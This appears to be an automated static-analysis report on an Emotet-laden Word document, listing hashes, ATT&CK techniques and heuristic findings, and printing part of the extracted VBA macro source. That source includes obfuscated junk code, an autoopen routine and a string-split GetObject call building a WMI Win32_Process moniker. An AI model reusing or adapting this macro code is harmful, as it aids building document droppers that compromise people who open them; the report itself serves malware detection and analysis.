Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 1c60cd89f7e71dc9…

MALICIOUS

Office (OLE)

Size: 103.9 KB · Created: 2019-05-02 07:58:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-31
MD5: 2c6802fddfab583247565a70def8336c · SHA-1: a1c98199f615a308dd8bc909b2a3cb4f7e019780 · SHA-256: 1c60cd89f7e71dc9867ec2c1ad7327f555e7cfb26315267798ee54d4e414eb57
Risk Score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File · T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. Heuristics flag an AutoOpen entry point and a GetObject call, together with a critical finding: the macro assembles the WMI moniker for Win32_Process from concatenated string fragments (such as 'winm' + 'g' + 'mts') to obtain a process-creation object. This strongly suggests the macro is designed to execute a payload, consistent with Emotet's typical behavior of downloading and running further malicious code. The ClamAV signature Doc.Dropper.Emotet-6960132-0 corroborates this identification.

Heuristics (8)

  • ClamAV: Doc.Dropper.Emotet-6960132-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-6960132-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas · Kind: vba-macro · Source: oletools.olevba.extract_macros (decoded VBA source) · Size: 8564 bytes
SHA-256: 311a9482aab794136513899ef095d631a724a9459c72d03dae56796bf6b71fdd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "rCUQAAB"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "cB111k"
Attribute VB_Base = "0{A92E610B-4206-44B0-8F2A-9D6883749F2C}{4B76A9A5-7CCC-4ECF-8F50-D5379EA09A3D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "zAGAwUAD"

Attribute VB_Name = "dAA4AAk"

Attribute VB_Name = "KQQZckUA"

Attribute VB_Name = "c4oDZX"
Attribute VB_Base = "0{F0857EF8-C2C9-4594-AE2B-EB01CB4256D7}{14961E62-FF42-4701-B258-BD9C33F9A32E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "EXDCD_"
Function OCBAU1(UUGD1QQA)
   Select Case FZZAQX
Case lDcAxA_ = UDAwkXxB = Sgn(200856712)
Case XxAQ41AU = TQCw4c
Case LB_kUxAc = Log(OZABA4xU)
Case CAQA1Gx = CBool(319167043)
Case bwUAcBDA = 329387077
Case fDAkAAQc = CDate(uZoBZA)
End Select
   Select Case oAkXAcQ
Case M_GCAwAU = qABAAXUQ = Sgn(804536849)
Case SQADAxU = nGABBDoA
Case UGQBDA = Log(zxDwcx1o)
Case tGwoAACA = CBool(406270910)
Case q1AwZQ = 944159749
Case TAB1AA4Q = CDate(NCUcQoDQ)
End Select
Set OCBAU1 = CVar(UUGD1QQA)
   Select Case mAx__UB
Case AAAAk1 = oUwABCA = Sgn(829431098)
Case tBUQ4B = rQAACQU
Case vADxAkwD = Log(CXUcAB4G)
Case LB1B4_A = CBool(199094074)
Case XUAkAXAD = 738858058
Case kDcAA_A = CDate(SkQ14D)
End Select
   Select Case ncGABD
Case Gc1XDUc = GBAAA4UA = Sgn(98233986)
Case iDQAw1k = MAUCGAQA
Case KADABAA = Log(TAAABZQA)
Case wQ4UAUZA = CBool(692514746)
Case r4AABA1w = 951950145
Case KAXZAok = CDate(QACDGACk)
End Select
End Function
Sub autoopen()
   Select Case wXQ41Q4
Case LkAAAc = jk_GAAC4 = Sgn(71459420)
Case MAAAxA = SGDkAUGZ
Case TAU4CkC = Log(iUAcwQ_C)
Case roCA1B = CBool(161147654)
Case l1AAcDUZ = 720077665
Case wA_o4AQ = CDate(f1_UAk)
End Select
   Select Case EGD4DDD
Case nQ4QBoA = jQcAAAA1 = Sgn(582743940)
Case KA_AAB = sXQ_cAU
Case wc1AAkcA = Log(sCQDZAAA)
Case qUAZZQ = CBool(739747204)
Case BAACAD = 603231392
Case I1ZQUAZ_ = CDate(PQAxDo)
End Select
   Select Case HxAUBAB
Case wA1BAU = HAoXAD = Sgn(699949487)
Case tGBo1AoG = NDQXDAA
Case PAUAAC = Log(Z1UA4kA)
Case JwGAUX = CBool(674716261)
Case oDAZQBAD = 280696191
Case NQCBAUD = CDate(hAcAw_CA)
End Select
Call iAAwAXoQ
   Select Case pA1DAX
Case ICkAAAA_ = Iw1AXA = Sgn(909803126)
Case EQ_AxBD = wAxBQxQZ
Case RAkABQ = Log(nACD_AA)
Case lGkQAA = CBool(462894309)
Case MA_1CUAA = 559402566
Case PoZQA4BA = CDate(NXAUABB)
End Select
   Select Case FkA4AQUU
Case C_wACCZ = dwUAAA = Sgn(100039355)
Case BcU1_QAB = AUUAxZ
Case CAADADQA = Log(tU_ADUGX)
Case AAUk4ADU = CBool(859094886)
Case mUwAAAC = 838082757
Case GAAcCUD = CDate(MA_4A4)
End Select
End Sub

Attribute VB_Name = "hQAQCA_"
Function iAAwAXoQ()
On Error Resume Next
   Select Case sAA1oBA
Case SXXADAoA = zCQADZ = Sgn(470924311)
Case QCACDcD = YoZADA
Case kUBDwDDA = Log(EZQQUAZ)
Case cwBQ1QUA = CBool(6498399)
Case fAkAADAc = 92771722
Case BAAcAAU_ = CDate(kUAQB4Q4)
End Select
   Select Case howUUDUU
Case nwZkZBo = u1DoAX = Sgn(475782560)
Case DwGUUx = NADZUk
Case ZAABCx = Log(VGQBxBX)
Case hAXADB = CBool(464226375)
Case PAAQZA = 130504987
Case nAQkAx = CDate(lZDAGAkZ)
End Select
   Select Case ioUZ1CAD
Case UDGAADAU = PAQkQA = Sgn(746428862)
Case zAwBAQ1 = IwGw_DAX
Case iAAwAkB = Log(fCZwAA)
Case HAo1cx4Q = CBool(60508244)
Case NAXADA = 518589997
Case BZAAACAU = CDate(B_ZUQU)
End Select
Set XAAkCU = OCBAU1(GetObject("winm" + "g" + "mts:W" + "in32_Process" + "Sta" + "rtup"))
   Select Case wAQ4AU
Case pAoBkwQA = r4ACGQB = Sgn(290371112)
... (truncated)